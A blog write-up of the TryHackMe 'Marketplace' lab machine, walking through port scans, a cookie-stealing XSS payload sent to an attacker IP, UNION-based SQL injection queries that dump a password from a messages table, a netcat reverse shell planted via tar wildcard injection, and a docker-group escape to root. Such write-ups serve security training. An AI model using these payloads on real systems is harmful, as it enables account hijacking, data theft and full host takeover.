m4luk0@home:~$

Marketplace Tryhackme Writeup

Today I bring you the writeup of marketplace, a tryhackme machine focused on web exploitation, here we go!

First we start with a port scan to see which ports are open.

nmap -p- --min-rate 5000 IP

With -p- we indicate that we want it to look at all ports and the –min-rate 5000 to do it very fast.

Now that we know the ports, let’s scan them deeply to see versions and so on.

nmap -sC -sV -p22,80,32768 --min-rate 5000 IP

With -sC we indicate that we want to run the default nmap scripts and -sV to get the service versions.

We see that we get the robots.txt with /admin then we will enter

We investigate ports 80 and 32768 and go to exactly the same web, so we will skip port 32768.

If we go to /admin it tells us this

We are going to register a new account to be able to see the product options and so on.

Let’s enter a product and click on the two options below, the one to report the product and the one to write to the product creator.

When reporting we get a message that the admin has checked the product; we have an option to create a product, we go there.

Let’s check if the creation of a product has xss and we could try to steal cookies from the admin when checking a report; xss is a vulnerability that allows us to execute javascript code, I will do a blog explaining it in depth soon.

<script>alert(1)</script>
<script>alert(2)</script>

We see that it is vulnerable, we are going to create another product to steal the cookies, but first we are going to open a python server to get them.

python3 -m http.server

Now to make the product for the cookies.

<img src=x onerror=this.src="http://IP:Port/?c="+document.cookie>

When we enter the product and hit report we will get the admin cookies, now let’s change ours for those and go to /admin.

We are going to enter in some user that we get.

If we see the url we can try a sqli; SQLi is a vulnerability that allows us to perform sql queries through the web to obtain information, I will upload a blog to explain it deeply in a while.

It seems vulnerable, let’s try to exploit it, with sqlmap I couldn’t because the admin cookie changes every x time so you will have to get it again.

Let’s see how many fields you have to write to do our tests.

user=1 order by 4-- -

Now let’s try to get the databases.

user=0 union select 1,group_concat(0x7c,schema_name,0x7c),3,4 from information_schema.schemata-- -

We are interested in the database marketplace, now let’s take out the tables it has.

user=0 union select 1,group_concat(0x7c,table_name,0x7c),3,4 from information_schema.tables where table_schema='marketplace'-- -

We see a messages table that seems quite interesting since the others are in the admin panel itself, at least, apparently.

user=0 union select 1,group_concat(0x7c,column_name,0x7c),3,4 from information_schema.columns where table_name='messages'-- -

Let’s take a look at the message_content to see if it has anything interesting.

user=0 union select 1,group_concat(0x7c,message_content,0x7c),3,4 from marketplace.messages-- -

We see a password, and we have several usernames of accounts created before ours which are: system michael jake

Let’s try to connect via ssh to those accounts.

ssh jake@IP

Let’s look at the sudo permissions you have.

sudo -l

We see that you have permissions with the user michael in a script, if we read that script we see that it makes a backup of everything in the /opt/backups folder.

To escalate privileges to michael we can use the wildcards of tar so that we get a reverse when we make the backup.

nc -lvp PORT

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP PORT >/tmp/f" > shell.sh
echo "" > "--checkpoint=1"
echo "" > "--checkpoint-action=exec=sh shell.sh"
chmod 777 shell.sh
chmod 777 backup.tar
sudo -u michael /opt/backups/backup.sh

We get the reverse and we are already michael.

id

We see that it is inside the docker group, let’s use that to escalate privileges.

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

And that’s all! thanks for reading.